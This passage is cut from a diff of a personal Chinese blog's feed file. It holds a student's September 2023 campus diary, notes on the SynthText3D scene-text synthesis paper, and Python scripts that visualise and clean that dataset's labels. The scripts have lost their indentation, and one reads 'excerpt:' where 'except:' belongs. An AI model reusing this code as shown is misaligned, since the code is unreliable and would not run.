    ax1.annotate(str(val) + '°C', xy=(x[i], y1[i]), textcoords='offset points', xytext=(0,10), ha='center')

    for i, val in enumerate(y2):
    ax1.annotate(str(val) + '°C', xy=(x[i], y2[i]), textcoords='offset points', xytext=(0,10), ha='center')

    for i, val in enumerate(y3):
    ax2.annotate(str(val), xy=(x[i], y3[i]), textcoords='offset points', xytext=(0,-15), ha='center')

    # 添加图例
    lines = ax1.get_lines() + ax2.get_lines()
    plt.legend(lines, [line.get_label() for line in lines], loc='lower left')

    # 添加标题
    plt.title('Temperature and PM Value')

    # 显示图表
    plt.show()

    png


    ​ 梧桐与银杏:

    jpg

    正文

    9.3

    ​ 把臭衣服臭被褥扔洗衣机后,决定去咪西一点东西。

    ​ 看微博说,冀大开了家瑞幸咖啡。

    jpg

    luckin coffee

    ​ 之前由保罗推荐,每周可以领一张 9.9 元的咖啡券,每周喝一杯也不错。


    关于规范校园电动自行车管理的通告

    ​ 为规范校园电动自行车管理,消除电动自行车安全隐患,确保师生生命财产安全和良好的校园秩序,根据相关法律法规和《冀大校园电动自行车管理暂行办法》决定自 2023 年 9 月 4 日起,对电动自行车进行规范管理,现就有关事项通告如下:

    ​ 一、电动自行车驾驶人员应严格遵守《中华人民共和国道路交通安全法》《中华人民共和国消防法》《公安部关于规范电动车停放充电加强火灾防范的通告》《河北省电动自行车管理条例》《河北省公安厅关于加强电动自行车消防安全管理的通告》等相关法律法规,安全用车,规范停车,自觉消除消防安全和交通安全隐患。

    ​ 二、校内人员电动自行车必须在辖区公安交通管理部门申请办理登记上牌手续,未办理牌照的电动自行车一律不得入校。合规电动自行车全部按照《冀大校园电动自行车管理暂行办法》要求在安全工作处登记备案,规范管理。

    ​ 三、用于警务、工程、维护维修、后勤保障等工作的电动自行车,需提前由所在单位到安全工作处办理备案手续。

    ​ 四、电动自行车驾驶人驾车入校必须佩戴安全头盔,入校后缓速行驶,并将电动自行车在指定区域有序停放。严禁乱停乱放,不得占用消防通道,不得影响正常交通。对初次违反行驶、停车管理规定的,给予批评教育并记录在案;违反 3 次以上的,采取暂扣车辆措施,并通报所在单位。

    ​ 五、电动自行车一律在指定区域充电,严禁电动自行车及电池进入宿舍、教学楼、办公楼、实验室等场所。否则一经发现将暂扣车辆,并根据相关管理规定对当事人严肃处理。

    ​ 六、在校园内违规使用电动自行车,导致安全事故或造成重大影响的,学校将配合执法部门依法依规追究当事人员的相应责任。

    ​ 七、各单位要对所属人员开展法律法规和校内规章制度的宣传教育,倡导安全文明绿色出行,引导师生员工遵规守纪,提高安全意识,同时加强巡查检查,及时发现处理违规行为,积极配合落实电动自行车管理工作措施,切实维护好自身和他人生命财产安全。

    特此通告

    安全工作处

    2023 年 8 月 31 日

    ​ 冀大要开始整治电瓶车了。还养了一堆看门狗监督学生不要把电瓶车骑到教学楼区域。大致意思就是冀大没有电瓶车充电桩,学生一般都是把电瓶车电池拆下来往楼里充电,这要不小心出事可就麻烦大了。于是机智的领导决定花钱安装电瓶车充电桩通过限制电瓶车的使用方式来让学生觉得骑电瓶车是一个困难而且麻烦的事,然后逐步放弃骑电瓶车,达到禁电瓶车的目的!真是太机智了!获得了底下学生一片骂声!

    ​ 之前要走的时候把电瓶车停在了学院楼下,现在那个位置不让停了,得把它骑回宿舍楼先😅。顺便把买的台灣特產送给同门吧。

    ​ 好在电瓶车当时没被洪水整坏,还能骑。这段时间我有点不太想骑电瓶车,打算观望一会儿,等风头过一过再开始骑。


    通  知

    ​ 本楼浴室即日起改造施工计划工期 12 天。施工期间请同学们到德新 1 号、德新 7 号北口浴室进行洗浴。
    ​ 德新 7 号北口浴室保留一卡通洗浴,德新 1 号采用“智慧笑联”平台运行,具体使用方法参看楼内张贴的使用说明。
    ​ 请同学们相互转告,给同学们带来不便,敬请谅解!

    2023 年 9 月 3 日

    ​ 冀大要开始整治澡堂了。

    ​ 据说我宿舍楼下的澡堂一直都能洗,但是我来冀大的第一天就开始装修了,歪撒女内😅。

    ​ 最后找德新 7 找了好久才找到了澡堂。

    合着我刚来学校 我宿舍浴室就装修
    那洗澡是麻烦的
    真傻逼啊
    主要是现在这样洗澡来回折腾
    跟白洗一样
    早不装修的
    偏偏开学了才来整这一处

    到学校后虽然又多了电瓶车管制和澡堂装修这俩傻逼事,但由于我对冀大的期望已经足够低,所以也没有感觉特别难受。

    ​ 因为这天大半夜就醒了去赶飞机,已经很久没睡觉了,所以也很早就睡了🥱。

    9.4

    jpg

    梧桐与银杏

    ​ 冀大著名景点——银杏大道。

    ​ 之前一直有的一个想法,每天在银杏大道的同一个视角前拍一张照片,时间久了把这些照片连起来,就能鲜明地展现出保定秋冬气候的变化😀。

    ​ 这个视角也选好了,就是银杏大道正中央一个坏掉的瓷砖前面了,希望冀大不要哪天把这个瓷砖修了😅。


    jpg

    Brann Bronzebeard
    这个电脑屏幕亮的一看就很牛逼
    6
    这么早的

    ​ 来到了实验室,因为这个实验室基本都是研三的所以人还蛮少,挺安静,好评!


    ​ 据说福建台风洪涝灾害十分严重。今年台风是蛮严重的,多而且猛。

    jpg

    厦门“湖里”
    好家伙
    火速逃离福建
    厦门被淹了
    关某跑的真巧
    差一点点就跑不掉了

    ​ 傍晚去澡堂还碰见了伟哥可还行。

    你参观伟哥洗澡了吗

    ​ 每天的大致时间线:

    • 6:00-7:00 的随机一个时刻醒来
    • 6:30-7:30 到实验室
    • 10:30-11:00 的随机一个时刻去食堂
    • 11:00 左右吃个午饭,回宿舍躺尸
    • 12:30-14:00 醒了,去实验室
    • 16:30-17:00 的随机一个时刻去食堂
    • 17:00-19:00 吃饭洗澡洗衣服躺尸一条龙
    • 19:00-19:30 去实验室
    • 21:30-22:00 回宿舍洗漱躺尸

    ​ 因为冀大的澡堂和食堂资源实在有限,所以我一般都是错峰出行避免人多,久而久之也习惯了。

    大概是太久没跟舍友在一起的缘故,感觉跟舍友之间生疏了不少,舍友们打游戏啊去聚餐啊去健身房啊也觉得没什么兴致想要加入。在这里经历了这么多事情后,在这里早已没有归属感,发完小论文马上跑路吧,有时候享受着一个人不被人打扰的感觉,有时候又感觉有些孤独。

    9.5

    jpg

    万佛寺

    ​ 厦门淹,厦门淹,厦门淹完福州淹。


    林徽因说:“其实结不结婚,都会后悔。巷子里的猫很自由,却没有归宿;围墙里的狗有归宿,却终身都要低头,人生这道选择题,怎么选都会有遗憾。

    但请你记住,无论怎么选,谋爱前先谋生,爱人前先爱己,一个人没有经济能力,才是万劫不复。”现在的你,论文和英语,是主要工作,要抓紧,其他的,自然会水到渠成。

    9.6

    jpg

    嘎嘎嘎

    ​ 打卡一下图书馆前的鸭子。


    jpg

    喜提隔间

    ​ 德新 7 的澡堂也要开始装修了,喜提白跑一趟,试了试德新 1,新澡堂有隔间,还不错!就是要用手机刷码有点麻烦。

    9.7

    @全体成员 今晚(周四)七点在 326 开会,请各位同学按时参加。

    ​ 许久没开的组会终于要开了!大致就是汇报了下大家的论文进度,除了牛伟和牛凡感觉进度都不怎样😅。杰哥说他的实验受计算资源的限制进行不下去,只得换方向。再次感叹道有些论文发不发得出还不完全是自己的原因,一些资源实在是太差了。冀大你个穷逼。

    9.8

    ​ 很想记录点什么,但好像这天都在实验室没啥可记录的。

    9.9

    ​ 保定又下雨了,天气有一点点凉,但北方的房子保暖能力实在太好,还是得短袖短裤😅。


    上午 9 点 45,在 C1-535 参加学术报告,提前 10 分钟来签到。@所有人
    报告会请假要找温老师开假条,导师签字(要评奖学金了,大家可别偷偷不来)

    ​ 又是撑场子大会。歪撒女内。

    ​ 上午还带了个枕头做个样子。下午直接翘了老子不陪冀大玩了告辞。

    9.10

    祝老师教师节快乐!
    谢谢大家!很开心!

    ​ 教师节师兄想送点东西,但是群里实在太尬没人带节奏最后啥也没送😅,想请导师吃个饭但是导师有事情就告吹了。隔壁师兄买了个大果篮结果他们导师不要给我们分了。

    9.11

    ​ 小迷糊在北京找到了新工作,恭喜小迷糊!

    9.12

    ​ 很想记录点什么,但好像这天都在实验室没啥可记录的。

    9.13

    ​ 很想记录点什么,但好像这天都在实验室没啥可记录的。

    9.14

    周四晚上七点在 326 开组会,组会内容由杰哥准备@杰哥

    ​ 又是组会了。

    ​ 我们的组会氛围比较轻快,挺好的。

    感谢我导对她的职称没什么追求让我几个大水逼赶紧水完论文跑路。不是自己的赛道,不卷了。

    9.15

    ​ ~~很想记录点什么,但好像这天都在实验室没啥可记录的。~~下午实在觉得疲乏,就躺宿舍了,然后顺便整理了下房间,整理出了一大坨😅。

    jpg

    一大坨

    ​ 澡堂总算是装修好了,终于不用去抢隔间了。

    9.16

    ​ 又是调代码的一天,还调上头了午休都不去了。

    ​ 识图复现一篇 CCFA 的论文,复现复现着总觉得原作者有点学术造假😅,把原始数据扔丹炉里直接把丹炉搞炸了,洗数据洗了老半天,勉强能跑,但是效果根本不会有它吹牛逼得那么好。

    前几天导师还在组会上感慨,计算机学生一心写代码,论文写作得乱七八糟。这个论文写作的牛逼哄哄,数据集给得乱七八糟。就觉得计算机学术圈真是乌烟瘴气的,反正都是形式主义,一点卵用没有,国家花那么多钱培养一堆垃圾。人家北大这么搞能出俩 CCFA,我冀大水一个 CCFC,不是问题!

    9.17

    ​ 大半夜又热得睡不着,同样的气温下,保定要比福州体感热很多。于是下午又摆了。

    ]]>
    @@ -5067,7 +5067,7 @@ /posts/Paper-SynthText3D-Synthesizing%20Scene%20Text%20Images%20from%203D%20Virtual%20Worlds/ - 资源

    全文

    Abstract

    ​ 一种用 3D 图形学引擎合成场景文本的方法。

    1. Introduction

    • 数据注释慢慢,合成数据快快,还没有人为错误。

    • 概述了下先前的场景文本图像合成方法。

    • 认为通过将文本插入静态 2D 背景图像总是差点意思。

    • 提出了一种结合 3D 信息的图像合成引擎 SynthText3D

      • 各种字体的文本实例首先被嵌入到 3D 虚拟世界中的适当位置。
      • 在 3D 虚拟世界中渲染包含具有各种照明条件和不同可见性的文本实例的虚拟场景,其中文本和场景被完整地渲染。
      • 最后,我们将相机设置为不同的位置和方向,以使投影的 2D 文本图像处于不同的视点。
    • 笔者认为 SynthText3D 具有的优势:

      • 3D 虚拟世界中的文本和场景被渲染为一个整体,这使得照明/可见性、透视变换和遮挡模拟更加逼真
      • 直接从引擎中获得准确的曲面法线信息,这有利于找到合适的区域来放置文本实例。
      • SynthText3D 可以生成具有不同视角、不同照明和不同可视度的文本实例,这类似于人眼的观察方式
    • 全文贡献:

      • 从 3D 引擎合成场景文本数据集,前无古人
      • 视觉效果牛逼!有复杂的透视变换、各种照明和遮挡。
      • 实验证明好使。

    2.1. Synthetic Data for Scene Text

    ​ 介绍一下前人工作:

    • Synth90K 只有裁剪的局部区域,不能直接用于 Text Detection
    • 大名鼎鼎的 SynthText……

    ​ 这些方法都不是从 3D 虚拟世界里渲染的。

    2.2. Image Synthesis in 3D Virtual Worlds

    ​ 领域有:

    • 人体姿态估计
    • 室内场景理解
    • 物体检测

    ​ 3D 模型的使用:

    • 在静态背景真实图像上渲染 3D 对象。
    • 随机排列充满物体的场景。
    • 使用商业游戏引擎:
      • 给他爱
      • Unreal

    2.3. Scene Text Detection

    ​ 介绍一下 STD。

    • 自上而下的方法。
    • 在通用对象检测的框架上将场景文本视为通用对象。

    3. Methodology

    3.1. Overview

    ​ 基于 UE4 和 UnrealCV 插件。

    ​ 9 个 3D 场景模型:

    • 5 个室内模型
    • 4 个室外模型

    jpg

    The pipeline of SynthText3D.
    • 摄像头锚点生成模块
    • 文本区域生成模块
    • 文字生成模块
    • 3D 渲染模块

    ​ 步骤:

    • 为每个 3D 模型手动初始化少量相机锚点。

    • 从 3D 引擎获得每个相机锚点的 RGB 图像和精确的表面法线图

    • 将基于曲面法线贴图生成可用的文本区域

    • 从所有可用的文本区域中随机选择几个区域,并根据文本区域的大小生成随机字体、文本内容和写作结构的文本(所选择的文本区域的文本颜色是根据相应区域的背景 RGB 图像生成的)

    • 将 2D 文本区域映射到 3D 虚拟世界中,并将相应的文本放置在其中

    3.2. Camera Anchor Generation

    • 手动检查,或者使用带注释的数据集来丢弃包含文本的背景图像。

    • 在虚拟场景中构建了一小组相机视点(每个 3D 模型大约 20 到 30 个),这些视点被视为初始锚点。在收集过程中,操作员控制摄影机在场景中导航,选择适合放置文本的视图。

    • 按照一个简单的规则选择相机锚点:视图中至少存在一个合适的区域。人工引导的摄像机锚点生成可以消除不合理的锚点,例如物体内部或昏暗光线下的锚点。

    3.3. Text Region Generation

    ​ 给定相机锚点,我们可以获得 3D 场景的可见部分,其中包含视图的RGB 图像深度图像曲面法线图

    ​ 这里,文本区域的生成是基于曲面法线贴图的。三维虚拟世界中坐标点的表面法线被定义为垂直于当前坐标点处该表面的切平面的单位向量。

    3.3.1 Normal Boundary Map

    ​ 前人的工作有用 gpb-UCM 分割来获得合适的文本区域,也有用模型估计的显著性图和基本语义事实图来提取合适的文本嵌入位置。

    ​ 但是我们用 3D 引擎,可以直接获得精确的深度图和法线图。

    ​ 使用简单的变换方程从曲面法线贴图生成法线边界图

    $$\begin{align}
    B_{i,j} =
    \begin{cases}
    1, & \max(|N_{i,j}-N0_{i,j}|,…,|N_{i,j}-Nk_{i,j}|) > t, \
    0, & \text{otherwise}.
    \end{cases}
    \end{align}$$

    • $t$ 被设为 100,表示法向量与其相邻向量之间的 $L_1$ 范数差的阈值。

    • $N_{i,j}$ 是法线边界图 $B$ 中的位置 $(i,j)$ 的值。

    • ${N0_{i,j},…,Nk_{i,j}}$ 是 4 个相邻位置(图像的边界位置除外)的一组法向量。

    • $|.|$ 是 $L_1$ 范数。

    jpg

    文本区域生成说明:
    (a) 原始图像
    (b) 曲面法线贴图
    (c) 法线边界图
    (d) 和 (e) 是生成的文本区域

    随机二进制搜索

    ​ 为了彻底提取所有可用的文本区域,我们在图像上设置了一个初始候选区域网格,灵感来自基于锚的对象检测器。

    ​ 在每个初始位置,我们从一个初始矩形边界框开始,该边界框的最小大小足以放置文本,设置为 32×64 像素。初始矩形框的步幅是从(12;24;36)中随机选择的。为了检索最大面积,我们提出了一种随机二进制搜索方法。

    ​ 在每个搜索步骤中,我们随机展开矩形的一侧。展开遵循二进制搜索的规则:

    • 下限被设置为当前边缘位置,上限被设置为图像的相应边缘。如果展开的矩形没有越过法线边界,则下限更新为中点;
    • 否则,将上限更新到中点。当每条边的上界和下界相等时,该算法收敛。
    • 在所有锚处生成框后,我们以随机顺序逐一检查每个框,如果任何框与任何其他框重叠,则将其丢弃。

    3.4. Text Generation

    ​ 生成文本区域后,我们随机抽取几个可用的文本区域进行文本渲染。给定一个文本区域及其 RBG 图像,文本生成模块旨在对具有特定外观的文本内容进行采样,包括字体和文本颜色。为了公平地与 SynthText 进行比较,我们使用了与相关论文相同的文本源,后者来自 Newsgroup 20 数据集。

    ​ 文本内容是从具有三种结构的文本源中随机抽取的,包括单词、行(最多 3 行)和段落。

    ​ 我们从 Google Fonts3 中随机抽取字体样本,用于生成文本的纹理。文本颜色由文本区域的背景决定,使用 SynthText 中相同的调色板模型。每个区域的纹理和颜色将被输入到 3D 渲染模块中,以执行 3D 渲染。

    3.5 3D Rendering

    ​ 三维渲染三维渲染包括两个子模块。

    • 第一个是 Text Placing Module,旨在将文本放置到三维虚拟世界中。
    • 第二个是 Rendering module,其中可以执行照明和可见性调整、视点变换、遮挡。

    3.5.1 Text Placing

    ​ 看样子它是根据 2D 的法线图,用 3D 的方式把文字打在图上的。

    2D-to-3D Region Projection

    ​ 使用从粗到细的策略将 2D 文本区域投影到 3D 虚拟世界中。

    ​ 假设 $p_j=(x_i,y_j)$ 是 2D 地图的坐标点,$d_j$ 是 $p_j$ 的深度值,则粗粒度 3D 坐标 $P=(X_j,Y_j,Z_j)$ 可以如下计算:

    $$\begin{bmatrix} X_j \ Y_j \ Z_j \end{bmatrix} = K \times d_j \times \begin{bmatrix} x_j \ y_j \ 1 \end{bmatrix}$$

    ​ 其中 $K$ 是相机的内部参考矩阵,它是相机的属性参数。整数深度的位置和浮点深度的位置之间出现偏差。

    jpg

    由整数深度和浮点深度计算的坐标。
    Pv:视点的坐标点;
    Pi:整数深度的坐标点;
    Pf:浮点深度的坐标点。

    ​ 为了获得细粒度的坐标,我们采用了光线投射,这是一个确定光线是否与物体相交以及在哪里相交的过程。如上图所示,我们初始化光线 $V=(P_i−P_v)$,其中 $P_i$ 是上式中估计的粗略点。然后,可以通过射线投射来获得细粒度点 $P_f$,该射线投射检测到离 $P_v$ 最近的命中点。

    ​ 最后通过迭代 3D 四边形来使得最后的边界框变成 3D 轴对齐的边界框。

    Text Deformation

    ​ 在自然情况下,并不是所有的文本区域都是平面,例如瓶子和衣服的表面,文本需要变形以适应目标表面。

    ​ 变形算法如下所示。我们将文本平面视为三角网格,将文本视为网格的纹理贴图。首先将网格的四个角顶点固定到区域角,然后将中间顶点变换到目标对象表面上最近的位置。最后,根据相对于角顶点的欧几里得距离来估计顶点的纹理坐标。

    jpg

    3.5.2 Rendering

    ​ 我们分别为每个场景建立了几个环境设置。对于每个室内场景,我们构建三种照明:正常照度、亮度和黑暗度。

    ​ 除了照明之外,我们还为室外场景添加了雾环境。

    ​ 渲染过程:Demonstration for Paper – SynthText3D: Synthesizing Scene Text Images from 3D Virtual Worlds - YouTube

    4. Experiments

    ​ 合成图像的硬件要求:

    • i7-8700 CPU
    • Nvidia GeForce GTX 1060 GPU
    • 16G RAM

    ​ 2 秒一张,大小为 720 * 1080

    4.1. Datasets

    ​ 用于评估和对比实验的数据集:

    • SynthText:800K 张,随机抽了 10K,就叫它 SynthText-10k。
    • VISD(10K)
    • ICDAR 2013(229+233)
    • ICDAR 2015(1000+500)
    • MLT(ICDAR2017,7200+1800+9000)

    4.2. Visual Analysis

    ​ 视觉分析两个关键因素影响合成数据的视觉效果。一个是合适的文本区域。另一个是渲染效果。

    4.2.1 Suitable Text Regions

    ​ 搁这吹自己 Text Regions 位置放的好呢。

    4.2.2 Rendering Effect

    ​ 搁这吹自己图像渲染得真实呢。

    4.3. Scene Text Detection

    ​ 使用 EAST,ResNet-50 作为 backbone,4 个 GPU,batch size 为 56。

    4.3.1 Pure Synthetic Data

    jpg

    ​ 比 SynthText 10K 好使!甚至我们 10K 的数据量比 800K 的 SynthText 都牛逼!

    ​ VISD 没有公开源码,只有数据集,我们的效果不如它,但是还是要嘴硬一句我们生成的图像在透视变换、各种照明和遮挡方面具有更逼真的外观。

    ​ 混合数据(我们的 5K+VISD 5K)进行训练来进行实验,效果最棒棒喔!

    4.3.2 Combination of Synthetic Data & Real Data

    jpg

    ​ 将合成数据集和真实数据集放一起 Train,效果还是比 VISD 低,真是气死宝宝了!

    ​ 继续嘴硬。VISD 使用 10K 真实世界背景图像,提供丰富的对象和纹理。然而,我们的合成图像是由基于大约 200 个相机锚点的 3D 虚拟世界投影的。这可能是我们的改进略低于 VISD 的原因。

    4.4. Limitations

    ​ 我们的方法的主要局限性是我们需要手动选择相机锚,尽管这相对容易实现,因为每个虚拟世界只有大约 20-30 个相机锚。然而,考虑到以前的方法也需要手动检查或注释来过滤包含文本的背景图像,我们的手动选择是可以接受的。我们将在未来的工作中尝试通过引入一种自动生成相机锚的算法来改进它。

    ​ 应该就是下一个论文了。

    5. Conclusion

    ​ 总结一下完事。

    代码

    数据集可视化

    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 27

    image_dir = r'E:\dataset\Synth3D-10K\img\\'
    label_dir = r'E:\dataset\Synth3D-10K\label\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ​ 但是通过人工审查,有些图像的质量实在不敢恭维,这真的好使吗?

    png

    转换成 TotalText 形式

    import numpy as np
    import os
    from tqdm import tqdm

    label_dir = r'E:\dataset\Synth3D-10K\label'
    save_dir = r"E:\dataset\Synth3D-10K\Txts"

    for index in tqdm(range(1, 10000 + 1)):
    label_path = os.path.join(label_dir, str(index) + '.txt')

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    string = ""

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += "#"
    string += "']\n"
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)
    import os
    from tqdm import tqdm

    file_dir = r"E:\dataset\Synth3D-10K\Images\\"

    for file in tqdm(os.listdir(file_dir)):
    os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))

    保存可视化结果(TotalText 形式)

    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt
    from shapely.geometry import Polygon
    from tqdm import tqdm

    image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
    label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
    save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

    for index in tqdm(range(1, 10001)):
    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    try:
    label_file = open(label_path, 'r')
    excerpt:
    continue
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)


    cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)

    清洗数据

    ​ 果然里面错误的数据太多,放到 mindOCR 里直接跑不动,让我怀疑这篇论文是不是有点问题,还得洗一洗:

    ​ 去除注释中:

    • 过小

    • 相交

    • 越界

    • 非法

    ​ 的数据,勉强能跑。

    ​ 还有些数据错的更复杂,算了能跑就行吧。

    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt
    from shapely.geometry import Polygon
    from tqdm import tqdm


    def check_intersection(rectangle, rectangle_list):
    for other_rectangle in rectangle_list:
    if rectangle != other_rectangle:
    other_polygon = Polygon(other_rectangle)

    if polygon.intersects(other_polygon):
    return True

    return False


    image_dir = r'F:\dataset\Synth3D-10K\img\\'
    label_dir = r'F:\dataset\Synth3D-10K\label\\'
    save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
    error_list = []

    for index in range(1, 10000 + 1):
    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
    points_list = []
    is_error = False

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points_list.append(Polygon(np.array([x, y], np.int32).T))

    if not is_error:
    string = ""
    for i in range(len(x_list)):
    x = list(map(int, x_list[i]))
    y = list(map(int, y_list[i]))

    polygon = Polygon(np.array([x, y], np.int32).T)

    if polygon.area < 200:
    is_error = True
    error_list.append(index)
    print(index, "四边形太小", polygon.area)
    continue

    if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
    is_error = True
    error_list.append(index)
    print(index, "不构成四边形")
    continue

    if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
    is_error = True
    error_list.append(index)
    print(index, "越界")
    continue

    if check_intersection(polygon, points_list):
    is_error = True
    error_list.append(index)
    print(index, "相交", polygon.area)
    continue

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += "A"
    string += "']\n"
    if len(string) > 0:
    print("写入", index)
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)
    ]]>
    + 资源

    全文

    Abstract

    ​ 一种用 3D 图形学引擎合成场景文本的方法。

    1. Introduction

    • 数据注释慢慢,合成数据快快,还没有人为错误。

    • 概述了下先前的场景文本图像合成方法。

    • 认为通过将文本插入静态 2D 背景图像总是差点意思。

    • 提出了一种结合 3D 信息的图像合成引擎 SynthText3D

      • 各种字体的文本实例首先被嵌入到 3D 虚拟世界中的适当位置。
      • 在 3D 虚拟世界中渲染包含具有各种照明条件和不同可见性的文本实例的虚拟场景,其中文本和场景被完整地渲染。
      • 最后,我们将相机设置为不同的位置和方向,以使投影的 2D 文本图像处于不同的视点。
    • 笔者认为 SynthText3D 具有的优势:

      • 3D 虚拟世界中的文本和场景被渲染为一个整体,这使得照明/可见性、透视变换和遮挡模拟更加逼真
      • 直接从引擎中获得准确的曲面法线信息,这有利于找到合适的区域来放置文本实例。
      • SynthText3D 可以生成具有不同视角、不同照明和不同可视度的文本实例,这类似于人眼的观察方式
    • 全文贡献:

      • 从 3D 引擎合成场景文本数据集,前无古人
      • 视觉效果牛逼!有复杂的透视变换、各种照明和遮挡。
      • 实验证明好使。

    2.1. Synthetic Data for Scene Text

    ​ 介绍一下前人工作:

    • Synth90K 只有裁剪的局部区域,不能直接用于 Text Detection
    • 大名鼎鼎的 SynthText……

    ​ 这些方法都不是从 3D 虚拟世界里渲染的。

    2.2. Image Synthesis in 3D Virtual Worlds

    ​ 领域有:

    • 人体姿态估计
    • 室内场景理解
    • 物体检测

    ​ 3D 模型的使用:

    • 在静态背景真实图像上渲染 3D 对象。
    • 随机排列充满物体的场景。
    • 使用商业游戏引擎:
      • 给他爱
      • Unreal

    2.3. Scene Text Detection

    ​ 介绍一下 STD。

    • 自上而下的方法。
    • 在通用对象检测的框架上将场景文本视为通用对象。

    3. Methodology

    3.1. Overview

    ​ 基于 UE4 和 UnrealCV 插件。

    ​ 9 个 3D 场景模型:

    • 5 个室内模型
    • 4 个室外模型

    jpg

    The pipeline of SynthText3D.
    • 摄像头锚点生成模块
    • 文本区域生成模块
    • 文字生成模块
    • 3D 渲染模块

    ​ 步骤:

    • 为每个 3D 模型手动初始化少量相机锚点。

    • 从 3D 引擎获得每个相机锚点的 RGB 图像和精确的表面法线图

    • 将基于曲面法线贴图生成可用的文本区域

    • 从所有可用的文本区域中随机选择几个区域,并根据文本区域的大小生成随机字体、文本内容和写作结构的文本(所选择的文本区域的文本颜色是根据相应区域的背景 RGB 图像生成的)

    • 将 2D 文本区域映射到 3D 虚拟世界中,并将相应的文本放置在其中

    3.2. Camera Anchor Generation

    • 手动检查,或者使用带注释的数据集来丢弃包含文本的背景图像。

    • 在虚拟场景中构建了一小组相机视点(每个 3D 模型大约 20 到 30 个),这些视点被视为初始锚点。在收集过程中,操作员控制摄影机在场景中导航,选择适合放置文本的视图。

    • 按照一个简单的规则选择相机锚点:视图中至少存在一个合适的区域。人工引导的摄像机锚点生成可以消除不合理的锚点,例如物体内部或昏暗光线下的锚点。

    3.3. Text Region Generation

    ​ 给定相机锚点,我们可以获得 3D 场景的可见部分,其中包含视图的RGB 图像深度图像曲面法线图

    ​ 这里,文本区域的生成是基于曲面法线贴图的。三维虚拟世界中坐标点的表面法线被定义为垂直于当前坐标点处该表面的切平面的单位向量。

    3.3.1 Normal Boundary Map

    ​ 前人的工作有用 gpb-UCM 分割来获得合适的文本区域,也有用模型估计的显著性图和基本语义事实图来提取合适的文本嵌入位置。

    ​ 但是我们用 3D 引擎,可以直接获得精确的深度图和法线图。

    ​ 使用简单的变换方程从曲面法线贴图生成法线边界图

    $$\begin{align}
    B_{i,j} =
    \begin{cases}
    1, & \max(|N_{i,j}-N0_{i,j}|,…,|N_{i,j}-Nk_{i,j}|) > t, \
    0, & \text{otherwise}.
    \end{cases}
    \end{align}$$

